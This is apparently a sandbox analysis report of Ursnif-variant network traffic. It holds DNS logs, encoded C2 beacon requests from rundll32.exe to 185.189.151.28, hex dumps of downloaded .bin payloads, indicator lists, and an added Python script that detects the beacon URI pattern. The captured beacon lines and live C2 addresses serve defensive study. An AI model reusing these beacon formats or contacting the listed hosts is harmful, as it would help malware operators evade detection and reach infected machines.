May 4, 2022 16:20:28.291598082 CEST | 64911 | 53 | 192.168.2.4 | 208.67.222.222
May 4, 2022 16:20:28.307825089 CEST | 53 | 64911 | 208.67.222.222 | 192.168.2.4
May 4, 2022 16:20:28.500524998 CEST | 64912 | 53 | 192.168.2.4 | 208.67.222.222
May 4, 2022 16:20:28.516555071 CEST | 53 | 64912 | 208.67.222.222 | 192.168.2.4
May 4, 2022 16:21:22.481286049 CEST | 52256 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2022 16:21:22.822657108 CEST | 53 | 52256 | 8.8.8.8 | 192.168.2.4
May 4, 2022 16:21:34.199577093 CEST | 52257 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2022 16:21:34.216151953 CEST | 53 | 52257 | 8.8.8.8 | 192.168.2.4
May 4, 2022 16:21:34.217381001 CEST | 52258 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2022 16:21:34.233515024 CEST | 53 | 52258 | 8.8.8.8 | 192.168.2.4
May 4, 2022 16:22:22.387646914 CEST | 64316 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2022 16:22:23.374944925 CEST | 64316 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2022 16:22:24.391297102 CEST | 64316 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2022 16:22:26.422003031 CEST | 64316 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2022 16:22:27.404277086 CEST | 53 | 64316 | 8.8.8.8 | 192.168.2.4
May 4, 2022 16:22:28.391235113 CEST | 53 | 64316 | 8.8.8.8 | 192.168.2.4
May 4, 2022 16:22:29.407274961 CEST | 53 | 64316 | 8.8.8.8 | 192.168.2.4
May 4, 2022 16:22:31.437788963 CEST | 53 | 64316 | 8.8.8.8 | 192.168.2.4
Timestamp | Source IP | Dest IP | Checksum | Code | Type
May 4, 2022 16:22:28.391390085 CEST | 192.168.2.4 | 8.8.8.8 | cff2 | (Port unreachable) | Destination Unreachable
May 4, 2022 16:22:29.407473087 CEST | 192.168.2.4 | 8.8.8.8 | cff2 | (Port unreachable) | Destination Unreachable
May 4, 2022 16:22:31.437877893 CEST | 192.168.2.4 | 8.8.8.8 | cff2 | (Port unreachable) | Destination Unreachable
Note: all three messages are sent by the sandbox host, each within 0.2 ms of a late reply from 8.8.8.8 to UDP port 64316 (the gamexperts.net lookup, transaction 0x5bcd): no socket was still bound to that port when the replies arrived, so the kernel rejected them.
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 4, 2022 16:20:28.160969973 CEST | 192.168.2.4 | 8.8.8.8 | 0x78a7 | Standard query (0) | resolver1.opendns.com | A (IP address) | IN (0x0001)
May 4, 2022 16:20:28.271305084 CEST | 192.168.2.4 | 208.67.222.222 | 0x1 | Standard query (0) | 222.222.67.208.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:20:28.291598082 CEST | 192.168.2.4 | 208.67.222.222 | 0x2 | Standard query (0) | myip.opendns.com | A (IP address) | IN (0x0001)
May 4, 2022 16:20:28.500524998 CEST | 192.168.2.4 | 208.67.222.222 | 0x3 | Standard query (0) | myip.opendns.com | 28 (AAAA) | IN (0x0001)
May 4, 2022 16:21:22.481286049 CEST | 192.168.2.4 | 8.8.8.8 | 0x82a5 | Standard query (0) | cabrioxmdes.at | A (IP address) | IN (0x0001)
May 4, 2022 16:21:34.199577093 CEST | 192.168.2.4 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:21:34.217381001 CEST | 192.168.2.4 | 8.8.8.8 | 0x2 | Standard query (0) | 1.0.0.127.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:22:22.387646914 CEST | 192.168.2.4 | 8.8.8.8 | 0x5bcd | Standard query (0) | gamexperts.net | A (IP address) | IN (0x0001)
May 4, 2022 16:22:23.374944925 CEST | 192.168.2.4 | 8.8.8.8 | 0x5bcd | Standard query (0) | gamexperts.net | A (IP address) | IN (0x0001)
May 4, 2022 16:22:24.391297102 CEST | 192.168.2.4 | 8.8.8.8 | 0x5bcd | Standard query (0) | gamexperts.net | A (IP address) | IN (0x0001)
May 4, 2022 16:22:26.422003031 CEST | 192.168.2.4 | 8.8.8.8 | 0x5bcd | Standard query (0) | gamexperts.net | A (IP address) | IN (0x0001)
Note: a PTR lookup of the resolver's own address followed by queries with sequential transaction IDs 0x1, 0x2, 0x3 is the sequence nslookup.exe produces; here it is used to ask myip.opendns.com for the sandbox's public address (the "May check the online IP address of the machine" signature), and the same pattern recurs at 16:21:34 against 8.8.8.8. The four gamexperts.net queries reuse transaction ID 0x5bcd, i.e. they are retransmissions of one lookup whose answers (all SERVFAIL, below) arrived about five seconds after each query.
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 4, 2022 16:20:28.177081108 CEST | 8.8.8.8 | 192.168.2.4 | 0x78a7 | No error (0) | resolver1.opendns.com | | 208.67.222.222 | A (IP address) | IN (0x0001)
May 4, 2022 16:20:28.287652969 CEST | 208.67.222.222 | 192.168.2.4 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:20:28.287652969 CEST | 208.67.222.222 | 192.168.2.4 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:20:28.287652969 CEST | 208.67.222.222 | 192.168.2.4 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:20:28.307825089 CEST | 208.67.222.222 | 192.168.2.4 | 0x2 | No error (0) | myip.opendns.com | | 102.129.143.40 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.077512026 CEST | 8.8.8.8 | 192.168.2.4 | 0x4708 | No error (0) | l-0007.l-dc-msedge.net | | 13.107.43.16 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 116.121.62.237 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 175.126.109.15 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 37.75.50.246 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 110.14.121.125 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 187.190.48.60 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 148.0.88.95 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 183.78.205.92 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 178.31.115.10 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 187.212.195.33 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 91.139.196.113 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:34.216151953 CEST | 8.8.8.8 | 192.168.2.4 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:21:34.233515024 CEST | 8.8.8.8 | 192.168.2.4 | 0x2 | Name error (3) | 1.0.0.127.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:22:27.404277086 CEST | 8.8.8.8 | 192.168.2.4 | 0x5bcd | Server failure (2) | gamexperts.net | none | none | A (IP address) | IN (0x0001)
May 4, 2022 16:22:28.391235113 CEST | 8.8.8.8 | 192.168.2.4 | 0x5bcd | Server failure (2) | gamexperts.net | none | none | A (IP address) | IN (0x0001)
May 4, 2022 16:22:29.407274961 CEST | 8.8.8.8 | 192.168.2.4 | 0x5bcd | Server failure (2) | gamexperts.net | none | none | A (IP address) | IN (0x0001)
May 4, 2022 16:22:31.437788963 CEST | 8.8.8.8 | 192.168.2.4 | 0x5bcd | Server failure (2) | gamexperts.net | none | none | A (IP address) | IN (0x0001)
Note: the 0x4708 answer for l-0007.l-dc-msedge.net has no matching query in the capture; it is where 13.107.43.16 in the Snort alerts comes from. cabrioxmdes.at returned ten A records spread over ten different /8 ranges; the check-ins at 16:21:23 and 16:21:35 went to the first of them, 116.121.62.237.
• 185.189.151.28
• 193.56.146.127
• cabrioxmdes.at
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49761 | 185.189.151.28 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2022 16:19:17.575335979 CEST | 1167 | OUT | GET /drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 185.189.151.28
Connection: Keep-Alive
Cache-Control: no-cache
May 4, 2022 16:19:17.863269091 CEST | 1168 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 04 May 2022 14:19:17 GMT
Content-Type: application/octet-stream
Content-Length: 186001
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="62728b65cf5d2.bin"
                                                        Data Raw: 90 fe 16 00 dd 20 a6 90 00 22 81 96 31 0c 06 ee 2c a0 48 f2 36 47 2b a8 1f 78 fb 84 fe 80 bc 68 83 a3 b0 1b 36 53 4b 75 0f a7 82 72 a1 41 e1 ff 47 06 9d 2a 90 8e 26 f8 83 6e 4c 7a ba 23 11 cb 7a c4 b5 76 5c eb 93 5b 14 3c c9 98 a5 e3 8b c6 36 cc 13 99 54 83 1a 4c 7b 46 49 91 17 ea 3b bb 0c 41 7e bf 1b 94 ad a3 32 05 aa 3b b0 4f 0c cb fc da 60 91 e2 bd 0d 03 9d 3c bd a2 dd d7 3f 0f 94 dc e3 06 b6 33 92 7e 82 88 84 01 f1 a2 02 d5 be cd 05 f8 80 06 a7 6e 5b 13 39 e7 33 43 f9 ee 65 41 c1 09 48 5c 39 3b 96 45 42 2c d6 0e 26 1b 0d 07 a7 4a 31 10 18 b4 36 c2 cb 88 ce 0e 68 30 dd c9 12 ff 5a 51 b6 1f 27 30 1a 25 a6 fb 5f b1 43 86 48 4a be 41 1d 15 20 30 a1 22 5a 46 58 f9 15 cc 69 9f 79 f8 78 b2 f1 f4 64 27 68 96 aa c1 73 d4 a7 58 3d ff ca 94 06 f9 ff 3e aa d1 00 6e c4 9d 6b 43 ac 0c 73 10 7f 0a 46 6d a9 74 29 b7 65 25 b5 77 93 76 25 7a b8 d9 0d 9c 83 ab 02 b1 78 eb 7b 8d 01 61 4d 6f 2e 0a da b3 c7 26 36 df 2a 95 d4 bf df d3 28 b1 c4 44 91 f7 ed 03 59 40 3e 4e f4 f3 2c 45 08 6c ca 1e 96 ba cc 33 c6 d6 79 6e fe fc 1f 27 b2 8a 2c 3c 8b e3 b4 14 90 a6 c2 99 62 62 09 88 68 9b e5 5d 5a 1b 90 23 e3 3f 1e 37 65 79 84 54 e6 fa 2d 39 d0 ab 72 5f 30 51 17 b6 8d 50 6c f0 28 5a 7e 77 5d 4f e7 c7 d6 f5 10 1c e5 da 36 7b 84 8e 94 d4 b7 df fa ab aa 17 53 ac e3 5b b0 72 c2 c8 65 0a a1 68 34 7f bd db 5d 00 76 de 42 e5 35 53 61 1f b2 46 e4 5d b5 7e a8 1e 4b 28 b7 9d 61 42 3c ec 8f ef c7 31 1c 8f 4c 68 8c 93 db e0 4b 86 ff 36 5e 8b e5 b6 46 f3 43 2c c5 92 03 de c3 8a 33 76 52 de 17 e1 6a 06 82 43 9b 7d 58 a6 f9 59 d0 35 f8 22 ec 02 92 5f c2 94 98 f9 9c 96 72 7e 76 47 66 f2 a7 7b 29 58 64 8a b4 df fe fc 78 4c 1b 45 88 71 86 ab 44 26 65 5b 29 85 31 04 6f 88 9a 15 b6 69 e2 90 95 32 fe 62 fe a0 0f 8f 8d 27 8d d0 63 31 96 18 ad c3 68 6d 1c 70 e8 65 66 f8 3d 34 d6 fb 93 0e 68 95 ae 3f 77 85 3e f6 c2 fd bd a3 12 e3 f3 a6 45 7e 74 c5 8b 22 2b 46 9f b3 fb 84 39 cc c4 6e 5f 09 3e cf c2 0b 7a d8 1a a2 f7 8f d2 7c c9 c7 0a 86 fa 2f c2 c4 
67 c1 14 c1 36 f4 7e ca 10 53 88 8f 87 0c 9a d8 40 02 b6 78 d9 3c 5d 0e 45 6d e7 1a 21 99 b0 29 1b e3 e0 c0 2b 02 47 bc 53 00 3c 8a 66 74 ca 12 c0 49 dc 75 43 18 6a 42 18 c7 9e 0b 55 fd 45 f0 5b 24 3a b5 3c 10 b5 a7 10 c7 28 d0 c7 35 3f 54 35 0e 43 41 1d bf f5 f3 9a f4 ff 81 26 48 fc 80 5f f1 f8 71 99 e4 0e 17 6a 1c 75 5d 64 95 f7 e1 88 a2 00 94 90 5f 6c d5 cd fc a5 72 b7 b6 e5 e8 5a 13 63 f5 4b b5 8e f2 82 41 64 7f ad 8e bd e9 6e 51 d0 ef ec 63 ab 78 09 ea e7 8c 71 e8 5b 12 a9 e1 0c 48 ed cb 06 da f3 7d ca 85 d7 45 2a 4b b1 c5 1c 9e 75 8e 33 0a 02 a8 57 71 0d b4 5c b3 46 dc 38 88 72 5b 66 00 55 4f 00 28 2c 61 67 7b 85 11 64 8c 84 de df 2f 2c 69 eb ba a7 86 a4 d1 ce df aa e3 93 48 d5 31 9a b5 8c e4 87 f9 e2 a0 e3 0c 04 b3 c4 40 f7 0f 35 de fc 0b d9 d3 2a 45 b4 91 93 26 51 19 8d f2 45 67 3b ed ed 42 e2 04 cd 3e 9c e7 c6 6f 15 1b aa 04 9e d3 e4 9f c4 7b 67 37 b7 40 48 05 e7 10 93 59 8a 81 f5 ca 77 22 e4 64 f5 a9 d5 0a 81 0e 53 8f c5 43 23 2d 3d 0f e4 a2 8a df c3 7b 13 3e 33 04 8c 56 2d 62 47 40 39 58 13 9c 69 1e b2 1f da 02 b7 59 0b d1 3e
                                                        Data Ascii: "1,H6G+xh6SKurAG*&nLz#zv\[<6TL{FI;A~2;O`<?3~n[93CeAH\9;EB,&J16h0ZQ'0%_CHJA 0"ZFXiyxd'hsX=>nkCsFmt)e%wv%zx{aMo.&6*(DY@>N,El3yn',<bbh]Z#?7eyT-9r_0QPl(Z~w]O6{S[reh4]vB5SaF]~K(aB<1LhK6^FC,3vRjC}XY5"_r~vGf{)XdxLEqD&e[)1oi2b'c1hmpef=4h?w>E~t"+F9n_>z|/g6~S@x<]Em!)+GS<ftIuCjBUE[$:<(5?T5CA&H_qju]d_lrZcKAdnQcxq[H}E*Ku3Wq\F8r[fUO(,ag{d/,iH1@5*E&QEg;B>o{g7@HYw"dSC#-={>3V-bG@9XiY>
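The request line above, and the second one in this session, have the URI shape that Snort SID 2033203 ("Ursnif Variant CnC Beacon - URI Struct M1 (_2B)") keys on: one base64 blob in which '+' and '/' are escaped as _2B and _2F, sliced with '/' at arbitrary points (in the first path a slice boundary even falls inside an escape, "taI_2BtJ_/2BPgmX"), followed by a short fake extension (.jlk). Reversing that wrapping on either captured path yields exactly 256 base64 characters, i.e. 192 bytes, a multiple of a 16-byte cipher block; the bytes themselves stay opaque, as does the 186001-byte "62728b65cf5d2.bin" response, whose printable rendering is noise. The following Python is an added example, not code from this report or from Joe Sandbox: it unwraps a request path and flags it when the result is block-aligned base64 data of beacon size. Assumptions, labelled in the code: the _3D escape for '=' (only _2B and _2F occur in this capture), the 32-byte minimum and 16-byte alignment thresholds, and the constructed benign request used for contrast. The two malicious lines are transcribed from this session.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# Request lines: the two GET lines transcribed from the HTTP session in this
# report, plus one constructed benign request for contrast.
SAMPLE_REQUEST_LINES: List[str] = [
    "GET /drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/"
    "_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/"
    "Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/"
    "GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/"
    "S.jlk HTTP/1.1",
    "GET /drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/"
    "VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/"
    "UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/"
    "S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/"
    "7.jlk HTTP/1.1",
    "GET /static/js/app.min.js?v=3 HTTP/1.1",   # constructed benign line
]

# The wrapped blob escapes the two base64 characters that are not URL-safe as
# _2B ('+') and _2F ('/'); both occur in the capture. _3D for '=' is assumed by
# analogy and does not occur here.
ESCAPES = {"_2B": "+", "_2F": "/", "_3D": "="}
ESCAPE_RE = re.compile(r"_2[BF]|_3D")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
MIN_PAYLOAD_BYTES = 32   # assumed threshold; the two captured beacons carry 192 bytes
BLOCK_SIZE = 16          # assumed alignment; both captured payloads are multiples of 16


@dataclass
class Verdict:
    path: str
    suspicious: bool
    reason: str
    payload_len: int = 0


def unwrap_blob(path: str) -> Optional[str]:
    """Reverse the wrapping seen in the capture.

    /<dir>/<base64 with '/' inserted and +/ escaped>.<ext>  ->  base64 text.
    Returns None when the path does not have that shape.
    """
    path = path.split("?", 1)[0]
    parts = [p for p in path.split("/") if p]
    if len(parts) < 3:                        # directory plus at least two slices
        return None
    joined = "".join(parts[1:])               # slashes were inserted after escaping,
    blob, dot, _ext = joined.rpartition(".")  # so a slash may split an escape sequence
    if not dot or not blob:
        return None
    return ESCAPE_RE.sub(lambda m: ESCAPES[m.group(0)], blob)


def classify_request_line(line: str) -> Verdict:
    """Flag a request line whose path unwraps to block-aligned base64 data."""
    try:
        _method, target, _version = line.split(" ", 2)
    except ValueError:
        return Verdict(line, False, "not a request line")
    blob = unwrap_blob(target)
    if blob is None:
        return Verdict(target, False, "path shape does not match")
    if not ESCAPE_RE.search(target.replace("/", "")):
        return Verdict(target, False, "no _2B/_2F escape sequences")
    if not B64_RE.match(blob) or len(blob) % 4:
        return Verdict(target, False, "unwrapped text is not well-formed base64")
    try:
        payload = base64.b64decode(blob, validate=True)
    except binascii.Error:
        return Verdict(target, False, "base64 decode failed")
    if len(payload) < MIN_PAYLOAD_BYTES or len(payload) % BLOCK_SIZE:
        return Verdict(target, False, "payload too short or not block-aligned", len(payload))
    return Verdict(target, True,
                   f"{target.count('/')} slashes, {len(payload)}-byte block-aligned payload",
                   len(payload))


def scan(lines: List[str]) -> List[Verdict]:
    """Classify every request line; feed it the GET lines from a proxy or IDS log."""
    return [classify_request_line(line) for line in lines]


if __name__ == "__main__":
    for v in scan(SAMPLE_REQUEST_LINES):
        print(("ALERT " if v.suspicious else "ok    ") + v.reason + ": " + v.path[:60])
```

The check deliberately works on the decoded length rather than on the literal "_2B" token the IDS rule name mentions, so a variant that happens to contain no '+' in its base64 output still matches as long as the path keeps its slice-and-extension shape; tune MIN_PAYLOAD_BYTES to your traffic. A companion check on the User-Agent is cheap: both requests claim MSIE 8.0 on Windows NT 10.0, a combination no real browser sends.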
May 4, 2022 16:19:18.765868902 CEST | 1367 | OUT | GET /drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 185.189.151.28
Connection: Keep-Alive
Cache-Control: no-cache
May 4, 2022 16:19:19.058303118 CEST | 1368 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 04 May 2022 14:19:19 GMT
Content-Type: application/octet-stream
Content-Length: 238738
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="62728b670adf7.bin"
                                                        Data Raw: 3b 4c 6b f7 b7 25 70 03 88 2d 7a 37 9e a1 c8 64 0b d8 31 31 97 0f c5 b0 5f f3 81 6d 9e c3 45 83 0a 34 18 f9 2a 0e ff 72 ff c7 33 d5 29 5d 81 f6 a5 6c 33 59 c7 fc d9 7d 59 a6 2c 44 a0 08 b0 48 8b 5c 88 ed 4d 9c 4e f2 9c 04 cf da 87 8f fc 28 44 1b 1f d6 84 bb dc 53 47 f0 25 da f7 b6 56 48 26 5b 83 11 f9 80 79 d3 3f ab 3f 7b 8a 14 23 8f 4d 34 6e a5 8d 52 88 cb c6 51 bd 4e 27 49 d6 ba 33 30 b3 e5 52 76 59 f9 49 45 bb 09 82 03 75 7c e0 12 67 43 e1 33 8e b9 58 1e 5a b6 16 2b cf ae 0e 8d cd e6 c9 bb 31 32 9c b6 7f 38 ef b7 14 c5 6b 56 72 db db f5 20 42 b0 21 7b c2 d3 e4 6b fa b6 29 2f 63 6f 43 cf fd 33 d1 f1 f3 33 82 eb 56 90 92 b4 a4 9c 0b 34 10 8d ed df d7 30 79 ee 6a 70 e6 2e 5b 2f d9 bf ad 8c 81 5f ec d7 15 c8 85 f6 42 0f 37 b8 b0 93 ac a1 85 c4 23 5e e0 43 b2 f2 93 6a d4 39 18 f6 17 0d d7 36 b6 2c 4f 0e 34 06 73 fa a7 52 3b a0 32 82 5c f1 6b e4 7a 99 fc 8d 27 58 8a 96 1b 31 e8 14 ee 43 b7 d2 fb 67 09 cb 2e 03 64 ad e4 8a 6a 5f 40 27 ac a0 21 ac cd 7a c6 94 f3 0b 04 1c f4 15 03 a5 59 24 02 68 2c 35 6a 8b 51 d7 90 e5 d9 30 8a 7f dc c2 68 ae 3c 42 9a 5c 68 06 a5 c2 c4 6e 0f ef 64 32 4f 69 ab 18 b4 9e 99 1f f5 05 56 47 02 8e 9f 27 d4 ff 10 20 e7 ed cd b1 4b 87 6e 27 42 1e 3e 24 80 4a 04 3c a3 49 30 16 f6 80 ec ff 7f 69 7e 67 e9 15 f7 0c 8d 63 a1 52 09 e9 b1 0e 05 e9 aa 92 c3 6e a8 af a5 9b c3 81 03 f7 56 3b 62 cc 61 4a 47 01 5f 44 7c dd 73 98 b0 56 89 42 12 05 2f fd 1e 39 b9 f3 98 27 a9 28 d5 bc c4 8e a4 e7 ec ab 89 c4 ce 19 ea b9 9c 21 dc 88 24 ec 64 2b cb a0 eb bf ca ae d2 49 96 b6 8a 04 ab fa 95 77 fa 63 0a 7a 0d 95 a1 96 99 44 58 4c cf 57 ae a4 39 c8 34 1e 91 57 0a 36 63 09 ab 63 76 c2 c1 18 dd ac c2 70 bf 06 25 e6 27 5d fc f2 4f 2b 48 d4 2b 9b aa 75 25 b7 70 f5 86 3b 83 06 05 3f 10 6e 86 51 69 da a6 a8 0d 8f 67 9f 77 dd f3 f1 bc a3 2b 9b cc 07 3c cd d5 4d 2e 5b 8d 0a 6e f3 42 ee 85 31 81 12 49 42 23 da f6 e0 21 58 34 f1 98 44 20 e0 34 20 6c e2 a7 e9 96 39 bf 64 eb 96 ab af dd c2 e5 93 2f 77 12 5b 31 
b6 d4 8e 98 e1 b0 b9 97 01 7b 07 2a 86 59 bd e8 00 a8 a3 36 12 48 2c f4 25 13 19 ba df bb ee 61 56 99 a8 ad 21 38 93 bd 47 26 58 af f0 db 46 7b b6 65 aa de cd dc 57 71 ed 57 29 3c a1 90 6f b4 ca a6 dc 2b a1 45 2a 15 3d 27 0d 14 ac e3 a7 f3 ce f4 a4 99 60 7c d7 95 79 41 ca 61 9a 6f 54 40 1a 4e 73 8d c8 57 85 c6 32 d8 e6 76 bd 9e 2b c8 77 57 64 55 68 1e e8 b8 ce e3 27 ea 88 e0 6b 84 d6 22 a8 40 53 1f fe fd 7f 2c 64 e5 e3 c0 ba b0 7c 8c 1f 0a 1f 3d a3 aa df 4c 84 66 69 de c4 52 16 4a cb 9d 1b 22 74 04 be b4 75 aa ac 10 43 9c 84 24 1d 8b bb 5b c6 a9 da 99 7a c4 10 3c d8 88 4e 6f 5d 84 05 33 69 2b e5 f6 16 bf 76 b7 e2 b7 61 1a 36 95 4b 28 79 75 83 0d af 82 36 39 fb e4 c0 3c c2 32 b4 cc c4 35 09 29 45 a8 bf a7 f5 c5 b1 91 71 b2 a5 a9 77 0d 1f 79 f3 f3 6c a3 ab 52 a9 26 9e df 64 d9 64 a6 4f 74 f8 7f be 12 b6 01 54 bd bc e1 a6 7e 85 e2 01 e7 11 f6 40 6c 49 4a e2 ec 18 e1 9b c7 7e 26 d7 09 41 4c b1 bd cb b6 91 c6 24 7f 1a 3d 1b 36 89 c0 c2 20 6c 33 01 13 79 75 f9 66 8c 40 13 41 38 66 3a 0f 9b 37 54 93 3b 5b 14 19 90 ea 68 99 54 78 3a f9 f4 73 f6
                                                        Data Ascii: ;Lk%p-z7d11_mE4*r3)]l3Y}Y,DH\MN(DSG%VH&[y??{#M4nRQN'I30RvYIEu|gC3XZ+128kVr B!{k)/coC33V40yjp.[/_B7#^Cj96,O4sR;2\kz'X1Cg.dj_@'!zY$h,5jQ0h<B\hnd2OiVG' Kn'B>$J<I0i~gcRnV;baJG_D|sVB/9'(!$d+IwczDXLW94W6ccvp%']O+H+u%p;?nQigw+<M.[nB1IB#!X4D 4 l9d/w[1{*Y6H,%aV!8G&XF{eWqW)<o+E*='`|yAaoT@NsW2v+wWdUh'k"@S,d|=LfiRJ"tuC$[z<No]3i+va6K(yu69<25)EqwylR&ddOtT~@lIJ~&AL$=6 l3yuf@A8f:7T;[hTx:s
                                                        May 4, 2022 16:19:19.326271057 CEST | 1619 | OUT | GET /drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                        Host: 185.189.151.28
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:19:19.626909018 CEST | 1620 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:19:19 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 1856
                                                        Connection: keep-alive
                                                        Pragma: public
                                                        Accept-Ranges: bytes
                                                        Expires: 0
                                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                        Content-Disposition: inline; filename="62728b6793eb1.bin"
